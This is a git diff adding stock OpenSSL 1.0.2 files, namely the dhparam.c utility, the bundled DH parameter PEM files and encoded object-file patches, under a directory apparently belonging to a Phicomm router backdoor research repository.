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
W?BjP9XlAlMCF0+~y-Z!~_WuMRcFeN?

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh1024.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh1024.pem
new file mode 100644
index 0000000..6eaeca9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh1024.pem
@@ -0,0 +1,10 @@
+-----BEGIN DH PARAMETERS-----
+MIGHAoGBAPSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kjwEPwpVsY
+jY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6
+ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XpL3jHAgEC
+-----END DH PARAMETERS-----
+
+These are the 1024 bit DH parameters from "Assigned Number for SKIP Protocols"
+(http://www.skip-vpn.org/spec/numbers.html).
+See there for how they were generated.
+Note that g is not a generator, but this is not a problem since p is a safe prime.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh2048.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh2048.pem
new file mode 100644
index 0000000..dcd0b8d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh2048.pem
@@ -0,0 +1,12 @@
+-----BEGIN DH PARAMETERS-----
+MIIBCAKCAQEA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlLOCDaAadWoxTpj0BV
+89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N286Z4VeSWc39uK50
+T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/RgBYK+X0iP1YTknb
+zSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdX
+Q6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqVDNmWn6vQClCbAkbT
+CD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwIBAg==
+-----END DH PARAMETERS-----
+
+These are the 2048 bit DH parameters from "Assigned Number for SKIP Protocols"
+(http://www.skip-vpn.org/spec/numbers.html).
+See there for how they were generated.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh4096.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh4096.pem
new file mode 100644
index 0000000..1b35ad8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh4096.pem
@@ -0,0 +1,18 @@
+-----BEGIN DH PARAMETERS-----
+MIICCAKCAgEA+hRyUsFN4VpJ1O8JLcCo/VWr19k3BCgJ4uk+d+KhehjdRqNDNyOQ
+l/MOyQNQfWXPeGKmOmIig6Ev/nm6Nf9Z2B1h3R4hExf+zTiHnvVPeRBhjdQi81rt
+Xeoh6TNrSBIKIHfUJWBh3va0TxxjQIs6IZOLeVNRLMqzeylWqMf49HsIXqbcokUS
+Vt1BkvLdW48j8PPv5DsKRN3tloTxqDJGo9tKvj1Fuk74A+Xda1kNhB7KFlqMyN98
+VETEJ6c7KpfOo30mnK30wqw3S8OtaIR/maYX72tGOno2ehFDkq3pnPtEbD2CScxc
+alJC+EL7RPk5c/tgeTvCngvc1KZn92Y//EI7G9tPZtylj2b56sHtMftIoYJ9+ODM
+sccD5Piz/rejE3Ome8EOOceUSCYAhXn8b3qvxVI1ddd1pED6FHRhFvLrZxFvBEM9
+ERRMp5QqOaHJkM+Dxv8Cj6MqrCbfC4u+ZErxodzuusgDgvZiLF22uxMZbobFWyte
+OvOzKGtwcTqO/1wV5gKkzu1ZVswVUQd5Gg8lJicwqRWyyNRczDDoG9jVDxmogKTH
+AaqLulO7R8Ifa1SwF2DteSGVtgWEN8gDpN3RBmmPTDngyF2DHb5qmpnznwtFKdTL
+KWbuHn491xNO25CQWMtem80uKw+pTnisBRF/454n1Jnhub144YRBoN8CAQI=
+-----END DH PARAMETERS-----
+
+These are the 4096 bit DH parameters from "Assigned Number for SKIP Protocols"
+(http://www.skip-vpn.org/spec/numbers.html).
+See there for how they were generated.
+Note that g is not a generator, but this is not a problem since p is a safe prime.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh512.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh512.pem
new file mode 100644
index 0000000..200d16c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dh512.pem
@@ -0,0 +1,9 @@
+-----BEGIN DH PARAMETERS-----
+MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
+XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
+-----END DH PARAMETERS-----
+
+These are the 512 bit DH parameters from "Assigned Number for SKIP Protocols"
+(http://www.skip-vpn.org/spec/numbers.html).
+See there for how they were generated.
+Note that g is not a generator, but this is not a problem since p is a safe prime.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.c
new file mode 100644
index 0000000..57199a8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.c
@@ -0,0 +1,546 @@
+/* apps/dhparam.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h> /* for OPENSSL_NO_DH */
+#ifndef OPENSSL_NO_DH
+# include <stdio.h>
+# include <stdlib.h>
+# include <time.h>
+# include <string.h>
+# include "apps.h"
+# include <openssl/bio.h>
+# include <openssl/err.h>
+# include <openssl/bn.h>
+# include <openssl/dh.h>
+# include <openssl/x509.h>
+# include <openssl/pem.h>
+
+# ifndef OPENSSL_NO_DSA
+#  include <openssl/dsa.h>
+# endif
+
+# undef PROG
+# define PROG    dhparam_main
+
+# define DEFBITS 2048
+
+/*-
+ * -inform arg  - input format - default PEM (DER or PEM)
+ * -outform arg - output format - default PEM
+ * -in arg      - input file - default stdin
+ * -out arg     - output file - default stdout
+ * -dsaparam  - read or generate DSA parameters, convert to DH
+ * -check       - check the parameters are ok
+ * -noout
+ * -text
+ * -C
+ */
+
+static int MS_CALLBACK dh_cb(int p, int n, BN_GENCB *cb);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    DH *dh = NULL;
+    int i, badops = 0, text = 0;
+# ifndef OPENSSL_NO_DSA
+    int dsaparam = 0;
+# endif
+    BIO *in = NULL, *out = NULL;
+    int informat, outformat, check = 0, noout = 0, C = 0, ret = 1;
+    char *infile, *outfile, *prog;
+    char *inrand = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    int num = 0, g = 0;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    infile = NULL;
+    outfile = NULL;
+    informat = FORMAT_PEM;
+    outformat = FORMAT_PEM;
+
+    prog = argv[0];
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-inform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            informat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-outform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outformat = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+# endif
+        else if (strcmp(*argv, "-check") == 0)
+            check = 1;
+        else if (strcmp(*argv, "-text") == 0)
+            text = 1;
+# ifndef OPENSSL_NO_DSA
+        else if (strcmp(*argv, "-dsaparam") == 0)
+            dsaparam = 1;
+# endif
+        else if (strcmp(*argv, "-C") == 0)
+            C = 1;
+        else if (strcmp(*argv, "-noout") == 0)
+            noout = 1;
+        else if (strcmp(*argv, "-2") == 0)
+            g = 2;
+        else if (strcmp(*argv, "-5") == 0)
+            g = 5;
+        else if (strcmp(*argv, "-rand") == 0) {
+            if (--argc < 1)
+                goto bad;
+            inrand = *(++argv);
+        } else if (((sscanf(*argv, "%d", &num) == 0) || (num <= 0)))
+            goto bad;
+        argv++;
+        argc--;
+    }
+
+    if (badops) {
+ bad:
+        BIO_printf(bio_err, "%s [options] [numbits]\n", prog);
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, " -inform arg   input format - one of DER PEM\n");
+        BIO_printf(bio_err,
+                   " -outform arg  output format - one of DER PEM\n");
+        BIO_printf(bio_err, " -in arg       input file\n");
+        BIO_printf(bio_err, " -out arg      output file\n");
+# ifndef OPENSSL_NO_DSA
+        BIO_printf(bio_err,
+                   " -dsaparam     read or generate DSA parameters, convert to DH\n");
+# endif
+        BIO_printf(bio_err, " -check        check the DH parameters\n");
+        BIO_printf(bio_err,
+                   " -text         print a text form of the DH parameters\n");
+        BIO_printf(bio_err, " -C            Output C code\n");
+        BIO_printf(bio_err,
+                   " -2            generate parameters using  2 as the generator value\n");
+        BIO_printf(bio_err,
+                   " -5            generate parameters using  5 as the generator value\n");
+        BIO_printf(bio_err,
+                   " numbits       number of bits in to generate (default 2048)\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e     use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "               - load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "               the random number generator\n");
+        BIO_printf(bio_err, " -noout        no output\n");
+        goto end;
+    }
+
+    ERR_load_crypto_strings();
+
+# ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+# endif
+
+    if (g && !num)
+        num = DEFBITS;
+
+# ifndef OPENSSL_NO_DSA
+    if (dsaparam) {
+        if (g) {
+            BIO_printf(bio_err,
+                       "generator may not be chosen for DSA parameters\n");
+            goto end;
+        }
+    } else
+# endif
+    {
+        /* DH parameters */
+        if (num && !g)
+            g = 2;
+    }
+
+    if (num) {
+
+        BN_GENCB cb;
+        BN_GENCB_set(&cb, dh_cb, bio_err);
+        if (!app_RAND_load_file(NULL, bio_err, 1) && inrand == NULL) {
+            BIO_printf(bio_err,
+                       "warning, not much extra random data, consider using the -rand option\n");
+        }
+        if (inrand != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(inrand));
+
+# ifndef OPENSSL_NO_DSA
+        if (dsaparam) {
+            DSA *dsa = DSA_new();
+
+            BIO_printf(bio_err,
+                       "Generating DSA parameters, %d bit long prime\n", num);
+            if (!dsa
+                || !DSA_generate_parameters_ex(dsa, num, NULL, 0, NULL, NULL,
+                                               &cb)) {
+                if (dsa)
+                    DSA_free(dsa);
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+
+            dh = DSA_dup_DH(dsa);
+            DSA_free(dsa);
+            if (dh == NULL) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        } else
+# endif
+        {
+            dh = DH_new();
+            BIO_printf(bio_err,
+                       "Generating DH parameters, %d bit long safe prime, generator %d\n",
+                       num, g);
+            BIO_printf(bio_err, "This is going to take a long time\n");
+            if (!dh || !DH_generate_parameters_ex(dh, num, g, &cb)) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        }
+
+        app_RAND_write_file(NULL, bio_err);
+    } else {
+
+        in = BIO_new(BIO_s_file());
+        if (in == NULL) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (infile == NULL)
+            BIO_set_fp(in, stdin, BIO_NOCLOSE);
+        else {
+            if (BIO_read_filename(in, infile) <= 0) {
+                perror(infile);
+                goto end;
+            }
+        }
+
+        if (informat != FORMAT_ASN1 && informat != FORMAT_PEM) {
+            BIO_printf(bio_err, "bad input format specified\n");
+            goto end;
+        }
+# ifndef OPENSSL_NO_DSA
+        if (dsaparam) {
+            DSA *dsa;
+
+            if (informat == FORMAT_ASN1)
+                dsa = d2i_DSAparams_bio(in, NULL);
+            else                /* informat == FORMAT_PEM */
+                dsa = PEM_read_bio_DSAparams(in, NULL, NULL, NULL);
+
+            if (dsa == NULL) {
+                BIO_printf(bio_err, "unable to load DSA parameters\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+
+            dh = DSA_dup_DH(dsa);
+            DSA_free(dsa);
+            if (dh == NULL) {
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        } else
+# endif
+        {
+            if (informat == FORMAT_ASN1)
+                dh = d2i_DHparams_bio(in, NULL);
+            else                /* informat == FORMAT_PEM */
+                dh = PEM_read_bio_DHparams(in, NULL, NULL, NULL);
+
+            if (dh == NULL) {
+                BIO_printf(bio_err, "unable to load DH parameters\n");
+                ERR_print_errors(bio_err);
+                goto end;
+            }
+        }
+
+        /* dh != NULL */
+    }
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL) {
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto end;
+        }
+    }
+
+    if (text) {
+        DHparams_print(out, dh);
+    }
+
+    if (check) {
+        if (!DH_check(dh, &i)) {
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+        if (i & DH_CHECK_P_NOT_PRIME)
+            printf("p value is not prime\n");
+        if (i & DH_CHECK_P_NOT_SAFE_PRIME)
+            printf("p value is not a safe prime\n");
+        if (i & DH_UNABLE_TO_CHECK_GENERATOR)
+            printf("unable to check the generator value\n");
+        if (i & DH_NOT_SUITABLE_GENERATOR)
+            printf("the g value is not a generator\n");
+        if (i == 0)
+            printf("DH parameters appear to be ok.\n");
+    }
+    if (C) {
+        unsigned char *data;
+        int len, l, bits;
+
+        len = BN_num_bytes(dh->p);
+        bits = BN_num_bits(dh->p);
+        data = (unsigned char *)OPENSSL_malloc(len);
+        if (data == NULL) {
+            perror("OPENSSL_malloc");
+            goto end;
+        }
+        printf("#ifndef HEADER_DH_H\n"
+               "#include <openssl/dh.h>\n" "#endif\n");
+        printf("DH *get_dh%d()\n\t{\n", bits);
+
+        l = BN_bn2bin(dh->p, data);
+        printf("\tstatic unsigned char dh%d_p[]={", bits);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t\t};\n");
+
+        l = BN_bn2bin(dh->g, data);
+        printf("\tstatic unsigned char dh%d_g[]={", bits);
+        for (i = 0; i < l; i++) {
+            if ((i % 12) == 0)
+                printf("\n\t\t");
+            printf("0x%02X,", data[i]);
+        }
+        printf("\n\t\t};\n");
+
+        printf("\tDH *dh;\n\n");
+        printf("\tif ((dh=DH_new()) == NULL) return(NULL);\n");
+        printf("\tdh->p=BN_bin2bn(dh%d_p,sizeof(dh%d_p),NULL);\n",
+               bits, bits);
+        printf("\tdh->g=BN_bin2bn(dh%d_g,sizeof(dh%d_g),NULL);\n",
+               bits, bits);
+        printf("\tif ((dh->p == NULL) || (dh->g == NULL))\n");
+        printf("\t\t{ DH_free(dh); return(NULL); }\n");
+        if (dh->length)
+            printf("\tdh->length = %ld;\n", dh->length);
+        printf("\treturn(dh);\n\t}\n");
+        OPENSSL_free(data);
+    }
+
+    if (!noout) {
+        if (outformat == FORMAT_ASN1)
+            i = i2d_DHparams_bio(out, dh);
+        else if (outformat == FORMAT_PEM) {
+            if (dh->q)
+                i = PEM_write_bio_DHxparams(out, dh);
+            else
+                i = PEM_write_bio_DHparams(out, dh);
+        } else {
+            BIO_printf(bio_err, "bad output format specified for outfile\n");
+            goto end;
+        }
+        if (!i) {
+            BIO_printf(bio_err, "unable to write DH parameters\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    }
+    ret = 0;
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    if (out != NULL)
+        BIO_free_all(out);
+    if (dh != NULL)
+        DH_free(dh);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+/* dh_cb is identical to dsa_cb in apps/dsaparam.c */
+static int MS_CALLBACK dh_cb(int p, int n, BN_GENCB *cb)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(cb->arg, &c, 1);
+    (void)BIO_flush(cb->arg);
+# ifdef LINT
+    p = n;
+# endif
+    return 1;
+}
+
+#else                           /* !OPENSSL_NO_DH */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dhparam.o
new file mode 100644
index 0000000000000000000000000000000000000000..698a52c6a34487664f62f3f2f540809f52ce0b28
GIT binary patch
literal 16104
zcmeI2dvqJsoyW&<oY+o~4G9pE6b6vN4z{plI}hRnE4GpeD33Y`kAxs(X>5tuk}Hiu
z9;6)VxJ9_3^g#=IV0Tlxr!4d=v^~2U!XX#}gu-TNVY?hy_V6eRHEvq6Y(onR+TZWa
z9qX&HZ@asvXaCxJteHEX`~Cgy?>^?v=vudg!mFp1m1#~Y(^hK5D~D=YVtFy&A+jBs
zM>|dXu;$#4HyQbtjiF!F#*LBbb@fze<h#6;{?TW<yfYUK7jiQ>;~W3nP@&A4IaHWt
z%^4TylJV-HLV2!&i>r;1y_LoR%RBQhSN}_{f|36x{+Eu-DiU%WH(Km!tO{E;^mOeZ
zHrjTSqX}LeyehaQxOq$d(<e?NO3{6Igo`P}L`jI(_(zX*dE2Q-);F|*^I9%o`^_Jd
z=L)7q{+Ka5YMo__uvhJHEgg>BNCz3Ku=Sq`in;_F9<AB`uhra+a^u)^FIyFkhx{iD
zs<o1@jG?2IA%7v{KgB&(Pk13?ItwwK=gI52<u<RCXPx=*iJCjEA`l+A&^XY>B%FUw
z)|^{VI9{{=DQY+OV)#I;QWQ`%wd0MG)#tPNTT`g#hV#D|8{~pXHJr&dHwc@~N+Unr
zJN6cZFj;pN>y}RFsO@8irV`fde|~EG_|*83sqw+7@wcYNUzrM9H&1Sbr*Pcb8Rkh!
zgEk)Zj~WLyd)p`JtnQ(kX-eJFF}{|Ek6Nvbw^B|QxkdKu7{7qXLP6$H&MR`B;N#O+
zJtO!y&o{27aC~guXN7_>ve{d2jED&)EA)?w;rxH7`9~kUjJoSEA7tnJDY|C-I^iWW
ze8M_ijA-sE8mV@zl13;T8a|b)?HcL#wsScR7!RDS+F(~MmyWghXK2l+8NQ!JSdNt_
zx2M6_=nPFGU)Ix8j^o%tDmF&MjcpvL_{PVDg1;bEM~b9_t2FYK*WjgNqwqRBnw!6l
z*4z1|?nK#m9hF#mIA5>>ESXJ4{wX=3IGUY8L36IX)X&=d(^9o=_#Nx=jl49|f)n!p
zB*b?^m)F=hVtK>DdMg!N%j@6EG?xV-VC0{%D<3|Q`yzJ7*xx%UNxAZ_{1_QbIp4WD
z(Jd41&X$I-`i`w7rxXy~qhW7HSN?q?{~MvFMf_*7TY2q0A>i2cJVZn7UM)9IuJH8W
